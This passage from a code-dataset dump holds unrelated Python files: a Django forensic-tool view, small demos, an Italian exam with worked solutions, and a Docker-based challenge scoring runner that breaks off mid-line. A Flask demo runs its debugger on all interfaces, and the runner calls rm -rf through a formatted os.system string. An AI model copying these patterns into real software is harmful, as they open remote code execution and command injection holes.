request.POST: \n if iid == -1:\n return HttpResponseRedirect(\"/ui/webhistory\")\n case = Webhistory.objects.get(pk=iid)\n if not case:\n return HttpResponseRedirect(\"/ui/webhistory\")\n qres = case.processWebhistory()\n if qres:\n return render(request, \"ui/creationreport.html\", \n {\"case\":case, \"success\": qres[0], \"notsuccess\": qres[1]})\n else:\n return HttpResponseRedirect(\"/ui/webhistory\")\n return HttpResponseRedirect(\"/ui/webhistory\")\n else:\n table = Webhistory.objects.all() \n if iid == -1: \n form = RequestWebhistoryForm()\n else:\n try:\n c, = Webhistory.objects.filter(pk=iid)\n form = RequestWebhistoryForm(instance=c)\n except ValueError:\n return HttpResponseRedirect(\"/ui/webhistory\")\n \n return render(request, \"ui/webhistory.html\", {\"form\": form, \"active_cases\": table})\n \ndef solutionView(request, iid=-1):\n table = Case.objects.all()\n if request.method == \"POST\":\n click = request.POST.getlist(\"click2\") \n chosen_image = request.POST.getlist(\"chosenimage\")\n foo_bar = request.POST.items()\n if iid != -1 and u'submit' in request.POST:\n if not chosen_image:\n return HttpResponseRedirect(\"/ui/solution\"+\"/\"+str(iid))\n images = Image.objects.filter(case = iid)\n \n\n this_case = Case.objects.filter(pk=iid)[0]\n this_image = Image.objects.filter(pk=int(chosen_image[0]))[0]\n this_trivial = TrivialObject.objects.filter(image=this_image)\n this_secret = HiddenObject.objects.filter(image=this_image) \n if not images:\n return HttpResponseRedirect(\"/ui/solution\")\n #return render(request, \"ui/solution.html\", { \"active_cases\": table, \"created_images\": images}) \n return render(request, \"ui/report.html\", {\"case\": this_case, \"timage\": this_image, \n \"trivial\": this_trivial, \"secret\": this_secret}) \n if click:\n Selection.setSelection(int(click[0]))\n return HttpResponseRedirect(\"/ui/solution\"+\"/\"+click[0])\n\n\n\n\n\n return HttpResponseRedirect(\"/ui/solution\")\n \n\n else:\n \n if iid == -1: \n pass\n else:\n try:\n images = Image.objects.filter(case = iid)\n\n if not images:\n return HttpResponseRedirect(\"/ui/solution\")\n return render(request, \"ui/solution.html\", { \"active_cases\": table, \"created_images\": images}) \n except ValueError:\n return HttpResponseRedirect(\"/ui/solution\")\n \n return render(request, \"ui/solution.html\", { \"active_cases\": table})\n \n\n \n \n","repo_name":"hannuvisti/forge","sub_path":"forensic/ui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13102,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"40"} +{"seq_id":"5847235029","text":"from enum_instrument import Builder, Type, Wood, Style\nfrom guitar import Guitar\nfrom guitar_specs import GuitarSpecs\nfrom inventory import Inventory\nfrom mandolin import Mandolin\nfrom mandolin_specs import MandolinSpecs\n\nspecification_1 = GuitarSpecs(Builder.FENDER, 'new', Type.AUCOUSTIC, Wood.MAHAGONY, Wood.MAHAGONY,12)\nspecification_2 = GuitarSpecs(Builder.MARTIN, 'old', Type.ELECTRIC, Wood.INDIAN_ROSEWOOD, Wood.MAHAGONY)\nspecification_3 = GuitarSpecs(Builder.FENDER, 'new', Type.AUCOUSTIC, Wood.INDIAN_ROSEWOOD, Wood.INDIAN_ROSEWOOD)\nspecification_4 = MandolinSpecs(Builder.FENDER, 'new', Type.OCTAVE, Wood.INDIAN_ROSEWOOD, Wood.INDIAN_ROSEWOOD,Style.A_STYLE)\n\nguitar_1 = Guitar('2134', 34.5, specification_1)\nguitar_2 = Guitar('1234', 44.5, specification_2)\nguitar_3 = Guitar('2222', 69.5, specification_3)\nmandolin_1 = Mandolin('1098', 79.3, specification_4)\n\nprint(guitar_2.__dict__)\nprint(mandolin_1.__dict__)\n\ninventory_1 = Inventory()\ninventory_1.add_instrument(guitar_1)\ninventory_1.add_instrument(guitar_2)\ninventory_1.add_instrument(guitar_3)\ninventory_1.add_instrument(mandolin_1)\n\ng = inventory_1.search_instrument(specification_4)\nprint(\"search mandolin\")\nfor elem in g:\n print(elem.to_dict())\n","repo_name":"kiritka-jain/instrument_inventory","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18780093357","text":"from elasticsearch import Elasticsearch, exceptions\n# declare globals for the Elasticsearch client host\nDOMAIN = \"elasticsearch\"\nPORT = 9200\nhost = str(DOMAIN) + \":\" + str(PORT)\nindex = \"autoscout-singlecar\"\nclient = Elasticsearch(host)\ndata = []\n\n# declare a filter query dict object\nmatch_all = {\n \"size\": 50,\n \"sort\": { \"created\": \"desc\"},\n \"query\": {\n \"match_all\": {}\n }\n}\n# make a search() request to get all docs in the index\nresp = client.search(\n index = index,\n body = match_all,\n scroll = '2s' # length of time to keep search context\n)\n\n# keep track of pass scroll _id\nold_scroll_id = resp['_scroll_id']\nwhile len(resp['hits']['hits']):\n resp = client.scroll(\n scroll_id = old_scroll_id,\n scroll = '2s' # length of time to keep search context\n )\n # keep track of pass scroll _id\n old_scroll_id = resp['_scroll_id']\n for doc in resp['hits']['hits']:\n data.append(doc[\"_source\"])\n\n# save\nimport pandas as pd\ndata = pd.DataFrame.from_dict(data)\ndata = data.set_index(\"URL\")\ndata.to_csv(\"data/output/autoscout-singlecars.csv.gz\",compression=\"gzip\")","repo_name":"JustinGuese/docker-autoscout-handler","sub_path":"docker-updatemeanvalues/elasticToPandas.py","file_name":"elasticToPandas.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36735665811","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, val=0, next=None):\r\n# self.val = val\r\n# self.next = next\r\nclass Solution:\r\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\r\n prev = head\r\n if prev is None:\r\n return head\r\n curr = prev.next\r\n if curr is None:\r\n return head\r\n forward = curr.next\r\n if forward is None:\r\n head = curr\r\n curr.next = prev\r\n prev.next = None\r\n return head\r\n prev.next = None\r\n while forward.next is not None:\r\n curr.next = prev\r\n prev = curr\r\n curr = forward\r\n forward = forward.next\r\n head = forward\r\n forward.next = curr\r\n curr.next = prev\r\n return head","repo_name":"Sagkun343/Leetcode","sub_path":"Reverse Linked List.py","file_name":"Reverse Linked List.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"183332427","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n################################################################################\n################################################################################\n################################################################################\n\n# Operazioni da svolgere PRIMA DI TUTTO:\n# 1) Salvare questo file come program.py\n# 2) Indicare nelle variabili in basso il proprio\n# NOME, COGNOME e NUMERO DI MATRICOLA\n\nnome = \"NOME\"\ncognome = \"COGNOME\"\nmatricola = \"MATRICOLA\"\n\n################################################################################\n################################################################################\n################################################################################\n# ---------------------------- SUGGERIMENTI PER IL DEBUG --------------------- #\n# Per eseguire solo alcuni dei test, si possono commentare le voci con cui la\n# lista 'test' è assegnata alla FINE di grade.py\n#\n# Per debuggare le funzioni ricorsive potete disattivare il test di ricorsione\n# settando DEBUG=True nel file grade.py\n#\n# DEBUG=True vi attiva anche lo STACK TRACE degli errori per sapere il numero\n# di linea di program.py che genera l'errore.\n################################################################################\n\n# ----------------------------------- EX.1 ----------------------------------- #\n\"\"\"\nEsercizio 1: 6 punti\n\nSi scriva una funzione ex1(file_query, file_db, k) che prende in\ningresso due stringhe file_query e file_db che puntano a due file di\ntesto, mentre k e' un intero. I file contengono punti in 2D su ogni\nriga. Ogni riga contiene le coordinate intere x e y separate da uno\nspazio, come ad esempio:\n\n -5 -5\n 10 5\n\nLa funzione deve leggere il contenuto dei file. Per ogni punto Q nel\nfile_query, si deve cercare gli indici dei k punti piu vicini a Q in\nfile_db. Per la distanza fra (x1, y1) e (x2, y2) si usi:\n(x1-x2)² + (y1-y2)²\n\nAd esempio, se k=2 e Q=(-5, -5) e DB e':\n\n 1 1\n -3 -5\n -5 -3\n 20 10\n\nallora gli indici e le distanze in DB rispetto a Q sono:\n\n| indice | x | y | dist |\n| 0 | 1 | 1 | 72 |\n| 1 | -3 | -5 | 4 |\n| 2 | -5 | -3 | 4 |\n| 3 | 20 | 10 | 850 |\n\nI due vicini a Q sono la lista [2, 1] in quanto hanno le k=2\ndistanze minori. In caso di parita' sulla distanza, come in questo\ncaso, si ritornano gli indici dal piu grande al piu piccolo.\n\nSi ritorni la lista che contiene le liste dei k indici vicini, per\nogni punto Q nel solito ordine in cui sono letti i punti Q dal\nfile_query.\n\nSe in ingresso abbiamo query_00.txt e db_00.txt e k=2, si deve ritornare:\n\n[[2, 1], [0, 3]]\n\"\"\"\n\n\ndef read_data(file_in):\n with open(file_in, mode='rt', encoding='utf8') as fr:\n data = []\n for idx, line in enumerate(fr):\n x, y = line.split()\n data.append((idx, (int(x), int(y))))\n return data\n\n\ndef ex1(file_query, file_db, k):\n query = read_data(file_query)\n db = read_data(file_db) # (idx, (x,y))\n rez = []\n for qq in query:\n idxs_pts = sorted(db,\n key=lambda p:\n (sum(map(lambda x1, x2: (x1-x2)**2, p[1], qq[1])),\n -p[0]))[:k]\n rez.append(list(map(lambda a: a[0], idxs_pts)))\n return rez\n\n\n# %% ----------------------------------- EX.2 ----------------------------------- #\n\"\"\"\nEsercizio 2: 6+3 punti\n\nScrivere una funzione che prenda in ingresso due nomi di file 'img_in'\ne 'img_out'. \nLa funzione (6 punti) deve leggere un'immagine png contenuta nel file 'img_in'\ncostituita da uno sfondo nero e da diversi pixel colorati e costruire e salvare\nin un nuovo file 'img_out' un'immagine delle stesse dimensioni di quella\ncontenuta in img_in. L'immagine ha al più tre pixel per ogni riga.\n\nLa nuova immagine dovrà contenere dei segmenti orizzontali calcolati a partire\ndall'immagine contenuta nel file 'img_in' nel seguente modo:\n - per ogni riga contenente almeno tre pixel, è presente esattamente un\n segmento\n - ogni segmento è in corrispondenza di tre pixel dell'immagine in 'img_in',\n presenti sulla stessa riga (esempio: se sulla riga y, ci sono i punti\n x1 maxl:\n maxl = l\n maxx = x[i:i+3]\n # print(x, maxx)\n color = tuple(int(sum(map(lambda x: riga[x][i], maxx))/3) for i in (0,1,2))\n newrow[maxx[0]:maxx[2]+1] = [color]*(maxl+1)\n return newrow\n \n\ndef ex2(img_in, img_out):\n img = images.load(img_in)\n img_o = []\n righe = []\n for riga in img:\n img_o.append(fatti_riga(riga))\n righe.append(1 if len(set(img_o[-1])-set([(0,0,0)]))>0 else 0)\n images.save(img_o, img_out)\n print(righe)\n m = 0\n c = 0\n for i in righe:\n if i>0:\n c+=1\n else:\n if c > m:\n m=c\n c = 0\n return m\n\n\ndef ex2(img_in, img_out):\n img = images.load(img_in)\n img_o = []\n righe = []\n for riga in img:\n img_o.append(fatti_riga(riga))\n if len(set(img_o[-1])-set([(0,0,0)]))>0:\n righe.append(1+sum(righe[-1:]))\n else:\n righe.append(0)\n # img_o[-1][-1]=(1,2,3)\n images.save(img_o, img_out)\n # print(righe)\n return max(righe)\n\n# %% ----------------------------------- EX.3 --------------------------------- #\n\n\"\"\"\nEsercizio 3: 8 punti \nScrivere una funzione ricorsiva o che fa uso di funzioni ricorsive che\nprende in input una stringa che rappresenta il nome di una directory e\nun intero k e restituisce un dizionario.\n\nAll'interno del dizionario le chiavi sono delle stringhe che rappresentano\ni percorsi di alcuni file con estenzione '.txt', relativi alla directory in\ninput.\nIl valore associato ad una chiave è il numero intero dato dalla somma\ndi tutte le stringhe numeriche contenute nel file indicato dalla chiave.\n\nATTENZIONE: devono essere presenti nel dizionario soltanto quei file che\ncontengono delle stringhe numeriche la cui somma è un valore multiplo\ndell'intero k preso in input.\n\n\nEs: se un file contiene \"34 casa c4a 22\", la somma delle stringhe numeriche\n in esso contenute è 34+22=56 (infatti c4a *non* è una stringa numerica).\n \nNon è consentito utilizzare la funzione os.walk.\nPer valutare se una stringa è numerica si può utilizzare il metodo isnumeric\n\"\"\"\n\nimport os\n\n\ndef check_file(file):\n with open(file) as f:\n text = f.read()\n return sum([int(w) for w in text.split() if w.isnumeric()])\n\ndef ex3(path, k):\n d = {}\n for file in os.listdir(path):\n ffile = path + '/' + file\n if os.path.isdir(ffile):\n d.update(ex3(ffile, k))\n if ffile.endswith('.txt') and os.path.isfile(ffile):\n i = check_file(ffile)\n if i % k == 0:\n d[ffile]=i\n return d\n\n# %% ----------------------------------- EX.4 ----------------------------------- #\n'''\nEsercizio 4: 9 punti (6+3)\n\nL'operazione di accodamento \"§\" fra due stringhe A e B è possibile se la stringa\nA termina con il primo carattere della stringa B. Il risultato dell'operazione\nA § B è simile alla concatenazione, soltanto che il primo carattere di B è\nrimosso: dog § good = dogood.\n\nScrivere una funzione ricorsiva o che fa uso di funzioni ricorsive che\nprende in input una stringa start e un set di stringhe words e calcola\nricorsivamente tutte le possibili stringhe massimali che possono essere generate\nda accodamenti successivi a partire dalla stringa start, rimuovendo le parole\naccodate. \nPer massimale si intende che una stringa non può essere più ulteriormente\nconcatenata con alcuna altra stringa rimasta in words, dopo tutti gli\naccodamenti.\n\nEsempio: 'aa' {'abb', 'acc', 'bdd', 'be'}\n\naa {abb, acc, bdd, be}\n|\n|- § abb -- aabb {acc, bdd, be}\n| |\n| |- § bdd -- aabbdd(*) {acc, be}\n| |\n| |- § be -- aabbe(*) {acc, bdd}\n|\n|- § acc -- aacc(*) {abb, bdd, be}\n\nLe stringhe con (*) sono massimali rispetto al set words iniziale.\n\nEsempio: 'dog' {'good', 'gost', 'goat', 'mood', 'doom', 'gasp', 'pool', 'long', 'loud'}\n\ndog {good, gost, goat, mood, doom, gasp, pool, loop}\n|\n|- § gost -- dogost(*) {good, goat, mood, doom, gasp, pool, loop}\n|\n|- § goat -- dogoat(*) {good, gost, mood, doom, gasp, pool, loop}\n|\n|- § good -- dogood {gost, goat, mood, doom, gasp, pool, long, loud}\n| |\n| |- § doom -- dogoodoom {gost, goat, mood, gasp, pool, long, loud}\n| |\n| |- § mood -- dogoodoomood(*) {gost, goat, gasp, pool, long, loud}\n|\n|- § gasp -- dogasp {good, gost, goat, mood, doom, pool, long, loud}\n |\n |- § pool -- dogaspool {good, gost, goat, mood, doom, long, loud}\n |\n |- § loud -- dogaspooloud {good, gost, goat, mood, doom, long}\n | |\n | |- § doom -- dogaspooloudoom {good, gost, goat, mood, long}\n | |\n | |- § mood -- dogaspooloudoomood(*) {good, gost, goat, long}\n |\n |- § long -- dogaspoolong {good, gost, goat, mood, doom, loud}\n |\n |- § good -- dogaspoolongood {mood, gost, goat, doom, loud}\n | |\n | |- § doom -- dogaspoolongoodoom {mood, gost, goat, loud}\n | |\n | |- § mood -- dogaspoolongoodoomood(*) {gost, goat, loud}\n |\n |- § gost -- dogaspoolongost(*) {good, goat, mood, doom, loud}\n |\n |- § goat -- dogaspoolongoat(*) {good, gost, mood, doom, loud}\n \nLe stringhe con (*) sono massimali rispetto al set words iniziale.\n\nLa funzione deve ritornare l'insieme di tutte le stringhe che è possibile\ngenerare (ovvero le foglie dell'albero di gioco), come un insieme (6 punti),\n oppure (+3 punti) come una lista ordinata in in cui:\n - le stringhe sono ordinate in modo crescente rispetto alla loro lunghezza\n - in caso di pari lunghezza, in ordine alfabetico.\n\nNell'esempio ex4('aa' ,{'abb', 'acc', 'bdd', 'be'}) la funzione ritorna l'insieme\n{'aacc', 'aabbdd', 'aabbe'} (6 punti)\noppure la lista\n['aacc', 'aabbe', 'aabbdd'] (9 punti)\n\nNell'esempio ex4('dog', {'good', 'gost', 'goat', 'mood', 'doom', 'gasp', 'pool', 'long', 'loud'})\nla funzione ritorna l'insieme\n{'dogaspoolongoodoomood', 'dogaspooloudoomood', 'dogoodoomood', 'dogaspoolongost',\n 'dogaspoolongoat', 'dogost', 'dogoat'} (6 punti)\noppure la lista \n['dogoat', 'dogost', 'dogoodoomood', 'dogaspoolongoat', 'dogaspoolongost', 'dogaspooloudoomood', 'dogaspoolongoodoomood'] (9 punti)\n\n'''\ndef ex4(start, words):\n s = ex4set(start, words)\n # if start[0]!='p':\n # return s\n return sorted(s, key=lambda x: (len(x), x))\n\ndef ex4set(start, words):\n if len(words) == 0:\n return {start}\n ret = set()\n append_list = [w for w in words if start.endswith(w[0])]\n if len(append_list) == 0:\n return {start}\n for word in append_list:\n ret.update(ex4(start[:-1]+word, words-{word}))\n return ret\n###################################################################################\nif __name__ == '__main__':\n # inserisci qui i tuoi test\n print('*'*50)\n print('ITA\\nDevi eseguire il grade.py se vuoi debuggare con il grader incorporato.')\n print('Altrimenit puoi inserire qui del codice per testare le tue funzioni ma devi scriverti i casi che vuoi testare')\n print('*'*50)\n print('ENG\\nYou have to run grade.py if you want to debug with the automatic grader.')\n print('Otherwise you can insert here you code to test the functions but you have to write your own tests')\n print('*'*50)\n","repo_name":"struggling-student/PythonExercises","sub_path":"Esami/2021-2022/Esame-5/program.aspo.py","file_name":"program.aspo.py","file_ext":"py","file_size_in_byte":12637,"program_lang":"python","lang":"it","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"42081123522","text":"# -*- coding: utf-8 -*-\n# @Time :2020/8/30 19:37\n# @Author : liufei\n# @File :元素定位.PY\n\nfrom appium import webdriver\nfrom appium.webdriver.common.mobileby import MobileBy\n\ndesird_caps = {}\n#appium服务器初始化\n#平台类型\ndesird_caps['platformName'] = 'Android'\n#平台版本号\ndesird_caps['platformVersion'] = '7.1'\n#设备名称\ndesird_caps['deviceName'] = 'Android Emulator'\n#app包名\ndesird_caps['appPackage'] = 'com.wandoujia.phoenix2'\n#app入口activitiy\ndesird_caps['appActivity'] = 'com.pp.assistant.activity.PPMainActivity'\n#连接appium server.\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desird_caps)\n\n'''\napp中的元素定位类型既有自己特殊的定位类型(accessibility_id、android_uiautomator等)\n又继承了web中selenium中的元素定位类型(tag_name、LINK_TEXT等)\n'''\n#元素定位,返回一个webelement对象\n#通过resource-id定位元素\ndriver.find_element_by_id('com.lemon.lemonban:id/navigation_tiku')\n#通过class定位元素\ndriver.find_element_by_class_name('android.widget.FrameLayout')\n#通过content-desc定位元素\ndriver.find_element_by_accessibility_id('******')\n#通过AndroidUiAutomator定位元素\ndriver.find_element_by_android_uiautomator('new UiSelector().text(\"柠檬社区\")')\n\n\n","repo_name":"James-Bond-Liu/Auto_Test","sub_path":"lemon_app/基础知识/元素定位.py","file_name":"元素定位.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12566841578","text":"__author__ = \"Janssen Lima\"\r\n__email__ = \"janssenreislima@gmail.com\"\r\n__status__ = \"prod\"\r\n\r\nimport logging\r\nfrom flask import Flask\r\n\r\n\r\napp = Flask(__name__)\r\n\r\nlog = logging.getLogger('werkzeug')\r\nlog.setLevel(logging.ERROR)\r\n\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n app.logger.info('Olá, mundo')\r\n return \"Olá, mundo!\"\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, port=5000,host=\"0.0.0.0\")\r\n","repo_name":"janssenlima/app-python","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70148581560","text":"import docker\nimport json\nimport subprocess\nimport requests\nfrom synapseclient import File, Folder\nimport synapseutils as synu\nimport zipfile\nimport os\nimport base64\nimport time\n\n#Synapse Id of Challenge\nCHALLENGE_SYN_ID = \"syn8228304\"\n#Synapse Id of directory that you want the log files to go into\nCHALLENGE_LOG_FOLDER = \"syn9771357\"\nCHALLENGE_PREDICTION_FOLDER = \"syn8729051\"\n\n## Name of your challenge, defaults to the name of the challenge's project\nCHALLENGE_NAME = \"NCI-CPTAC DREAM Proteogenomics Challenge\"\n\n## Synapse user IDs of the challenge admins who will be notified by email\n## about errors in the scoring script\nADMIN_USER_IDS = [3324230,3360851]\n\n\nconfig_evaluations = [\n#Proteogenomics Subchallenge 1 (8720143)\n#Proteogenomics Subchallenge 2 (8720145)\n#Proteogenomics Subchallenge 3 (8720149)\n\n {\n 'id':8720143,\n 'score_sh':'/score_sc1.sh',\n 'returnLog':False\n },\n {\n 'id':8720145,\n 'score_sh':'/score_sc2.sh',\n 'returnLog':False\n },\n {\n 'id':8720149,\n 'score_sh':'/score_sc3.sh',\n 'returnLog':False\n },\n#Proteogenomics Subchallenge 1 Express (9604716)\n#Proteogenomics Subchallenge 2 Express (9604717)\n#Proteogenomics Subchallenge 3 Express (9604718)\n\n {\n 'id':9604716,\n 'score_sh':'/score_sc1.sh',\n 'returnLog':True\n },\n {\n 'id':9604717,\n 'score_sh':'/score_sc2.sh',\n 'returnLog':True\n },\n {\n 'id':9604718,\n 'score_sh':'/score_sc3.sh',\n 'returnLog':True\n },\n#Proteogenomics Subchallenge 1 Internal (9606530)\n#Proteogenomics Subchallenge 2 Internal (9606531)\n#Proteogenomics Subchallenge 3 Internal (9606532)\n\n {\n 'id':9606530,\n 'score_sh':'/score_sc1.sh',\n 'returnLog':True\n },\n {\n 'id':9606531,\n 'score_sh':'/score_sc2.sh',\n 'returnLog':True\n },\n {\n 'id':9606532,\n 'score_sh':'/score_sc3.sh',\n 'returnLog':True\n }\n\n]\n\nconfig_evaluations_map = {ev['id']:ev for ev in config_evaluations}\nleaderboard_tables = {}\n\ndef getBearerTokenURL(dockerRequestURL, user, password):\n initialReq = requests.get(dockerRequestURL)\n auth_headers = initialReq.headers['Www-Authenticate'].replace('\"','').split(\",\")\n for head in auth_headers:\n if head.startswith(\"Bearer realm=\"):\n bearerRealm = head.split('Bearer realm=')[1]\n elif head.startswith('service='):\n service = head.split('service=')[1]\n elif head.startswith('scope='):\n scope = head.split('scope=')[1]\n return(\"{0}?service={1}&scope={2}\".format(bearerRealm,service,scope))\n\ndef getAuthToken(dockerRequestURL, user, password):\n bearerTokenURL = getBearerTokenURL(dockerRequestURL, user, password)\n auth = base64.b64encode(user + \":\" + password)\n bearerTokenRequest = requests.get(bearerTokenURL,\n headers={'Authorization': 'Basic %s' % auth})\n return(bearerTokenRequest.json()['token'])\n\ndef zipdir(path, ziph):\n # ziph is zipfile handle\n for root, dirs, files in os.walk(path):\n for file in files:\n ziph.write(os.path.join(root, file),os.path.join(root, file).replace(path+\"/\",\"\"))\n\n\ndef dockerValidate(submission, syn, user, password, returnLog):\n submissionJson = json.loads(submission['entityBundleJSON'])\n assert submissionJson['entity'].get('repositoryName') is not None, \"Must submit a docker container\"\n dockerRepo = submissionJson['entity']['repositoryName'].replace(\"docker.synapse.org/\",\"\")\n #assert dockerRepo.startswith(\"docker.synapse.org\")\n assert submission.get('dockerDigest') is not None, \"Must submit a docker container with a docker sha digest\"\n dockerDigest = submission['dockerDigest']\n index_endpoint = 'https://docker.synapse.org'\n #dockerImage = dockerRepo + \"@\" + dockerDigest\n\n #Check if docker is able to be pulled\n dockerRequestURL = '{0}/v2/{1}/manifests/{2}'.format(index_endpoint, dockerRepo, dockerDigest)\n token = getAuthToken(dockerRequestURL, user, password)\n\n resp = requests.get(dockerRequestURL,\n headers={'Authorization': 'Bearer %s' % token})\n assert resp.status_code == 200, \"Docker image + sha digest must exist\"\n \n #Must check docker image size\n #Synapse docker registry\n dockerSize = sum([layer['size'] for layer in resp.json()['layers']])\n assert dockerSize/1000000000.0 < 1000, \"Docker image must be less than a teribyte\"\n\n #Send email to me if harddrive is full \n #should be stateless, if there needs to be code changes to the docker agent\n preds = synu.walk(syn, CHALLENGE_PREDICTION_FOLDER)\n predFolders = preds.next()[1]\n predSynId = [synId for name, synId in predFolders if str(submission.id) == name]\n\n logs = synu.walk(syn, CHALLENGE_LOG_FOLDER)\n logsFolders = logs.next()[1]\n logsSynId = [synId for name, synId in logsFolders if str(submission.id) == name]\n\n if len(predSynId) == 0:\n predFolder = syn.store(Folder(submission.id, parent = CHALLENGE_PREDICTION_FOLDER))\n predFolder = predFolder.id\n else:\n predFolder = predSynId[0]\n if len(logsSynId) == 0:\n logFolder = syn.store(Folder(submission.id, parent = CHALLENGE_LOG_FOLDER))\n logFolder = logFolder.id\n if returnLog:\n for participant in submission.contributors:\n if participant['principalId'] in ADMIN_USER_IDS: \n access = ['CREATE', 'READ', 'DOWNLOAD', 'UPDATE', 'DELETE', 'CHANGE_PERMISSIONS', 'MODERATE', 'CHANGE_SETTINGS']\n else:\n access = ['READ','DOWNLOAD']\n #Comment set permissions out if you don't want to allow participants to see the pred files\n #syn.setPermissions(predFolder, principalId = participant['principalId'], accessType = access)\n syn.setPermissions(logFolder, principalId = participant['principalId'], accessType = access)\n else:\n logFolder = logsSynId[0] \n\n if returnLog:\n messageReturned = \"Your submission has been validated! As your submission is being ran, please go here: https://www.synapse.org/#!Synapse:%s to check on your log file.\" % logFolder \n else:\n messageReturned = \"Your submission has been validated! Your log files will not be returned, please submit to express lanes to test your model!\"\n\n return(True, messageReturned)\n\n\ndef dockerRun(submission, scoring_sh, syn, client):\n\n #These are the volumes that you want to mount onto your docker container\n OUTPUT_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)),submission.id)\n TESTDATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)),'evaluation_data')\n #These are the locations on the docker that you want your mounted volumes to be + permissions in docker (ro, rw)\n #It has to be in this format '/output:rw'\n MOUNTED_VOLUMES = {OUTPUT_DIR:'/output:rw',\n TESTDATA_DIR:'/evaluation_data:ro'}\n #All mounted volumes here in a list\n ALL_VOLUMES = [OUTPUT_DIR,TESTDATA_DIR]\n\n allLogs = synu.walk(syn, CHALLENGE_LOG_FOLDER)\n logFolder = allLogs.next()\n logFolderId = [synId for name, synId in logFolder[1] if name == submission.id][0]\n \n allPreds = synu.walk(syn, CHALLENGE_PREDICTION_FOLDER)\n predFolder = allPreds.next()\n predFolderId = [synId for name, synId in predFolder[1] if name == submission.id][0]\n\n dockerDigest = submission.get('dockerDigest')\n submissionJson = json.loads(submission['entityBundleJSON'])\n dockerRepo = submissionJson['entity']['repositoryName']\n dockerImage = dockerRepo + \"@\" + dockerDigest\n\n if not os.path.exists(OUTPUT_DIR):\n os.mkdir(OUTPUT_DIR)\n #Mount volumes\n volumes = {}\n for vol in ALL_VOLUMES:\n volumes[vol] = {'bind': MOUNTED_VOLUMES[vol].split(\":\")[0], 'mode': MOUNTED_VOLUMES[vol].split(\":\")[1]}\n\n # Run docker image\n errors = None\n try:\n container = client.containers.run(dockerImage, scoring_sh, detach=True,volumes = volumes, name=submission.id + \"_t\" + str(int(time.time())), network_disabled=True)\n except docker.errors.APIError as e:\n container = None\n errors = str(e) + \"\\n\"\n #Create log file\n logFileName = submission.id + \"_log.txt\"\n logSynId = None\n #Create the logfile\n openLog = open(logFileName,'w').close()\n #While docker is still running (the docker python client doesn't update status)\n #Add sleeps\n if container is not None:\n while subprocess.Popen(['docker','inspect','-f','{{.State.Running}}',container.name],stdout = subprocess.PIPE).communicate()[0] == \"true\\n\":\n logFileText = container.logs()\n with open(logFileName,'w') as logFile:\n logFile.write(logFileText)\n statinfo = os.stat(logFileName)\n #Only store log file if > 0bytes\n if statinfo.st_size > 0 and statinfo.st_size/1000.0 <= 50:\n ent = File(logFileName, parent = logFolderId)\n try:\n logs = syn.store(ent)\n logSynId = logs.id\n except synapseclient.exceptions.SynapseHTTPError as e:\n pass\n time.sleep(60)\n\n #Must run again to make sure all the logs are captured\n logFileText = container.logs()\n with open(logFileName,'w') as logFile:\n logFile.write(logFileText)\n statinfo = os.stat(logFileName)\n #Only store log file if > 0bytes\n if statinfo.st_size > 0 and statinfo.st_size/1000.0 <= 50:\n ent = File(logFileName, parent = logFolderId)\n try:\n logs = syn.store(ent)\n logSynId = logs.id\n except synapseclient.exceptions.SynapseHTTPError as e:\n pass\n container.remove()\n try:\n client.images.remove(dockerImage)\n except:\n print(\"Unable to remove image\")\n\n statinfo = os.stat(logFileName)\n if statinfo.st_size == 0:\n with open(logFileName,'w') as logFile:\n if errors is not None:\n logFile.write(errors)\n else:\n logFile.write(\"No Logs, or logs exceed size limit\")\n logFile.flush()\n ent = File(logFileName, parent = logFolderId)\n try:\n logs = syn.store(ent)\n logSynId = logs.id\n except synapseclient.exceptions.SynapseHTTPError as e:\n pass\n\n if logSynId is None:\n logFile = synu.walk(syn, logFolderId)\n logFiles = logFile.next()\n logSynId = logFiles[2][0][1]\n #Zip up predictions and store it into CHALLENGE_PREDICTIONS_FOLDER\n if len(os.listdir(OUTPUT_DIR)) > 0:\n zipf = zipfile.ZipFile(submission.id + '_predictions.zip', 'w', zipfile.ZIP_DEFLATED)\n zipdir(OUTPUT_DIR, zipf)\n zipf.close()\n\n ent = File(submission.id + '_predictions.zip', parent = predFolderId)\n predictions = syn.store(ent)\n prediction_synId = predictions.id\n os.system(\"rm -rf %s\" % OUTPUT_DIR)\n os.remove(submission.id + '_predictions.zip')\n else:\n prediction_synId = None\n os.remove(logFileName)\n return(prediction_synId, logSynId)\n\n\n\ndef validate_docker(evaluation, submission, syn, client, user, password):\n \"\"\"\n Find the right validation function and validate the submission.\n\n :returns: (True, message) if validated, (False, message) if\n validation fails or throws exception\n \"\"\"\n config = config_evaluations_map[int(evaluation.id)]\n\n results = dockerValidate(submission, syn, user, password, config['returnLog'])\n return(results)\n\ndef run_docker(evaluation, submission, syn, client):\n \"\"\"\n Find the right scoring function and score the submission\n\n :returns: (score, message) where score is a dict of stats and message\n is text for display to user\n \"\"\"\n\n config = config_evaluations_map[int(evaluation.id)]\n prediction_synId, log_synId = dockerRun(submission,config['score_sh'], syn, client)\n if prediction_synId is not None:\n #Comment top line if you don't want to return the synId of prediction file\n #message = \"You can find your prediction file here: 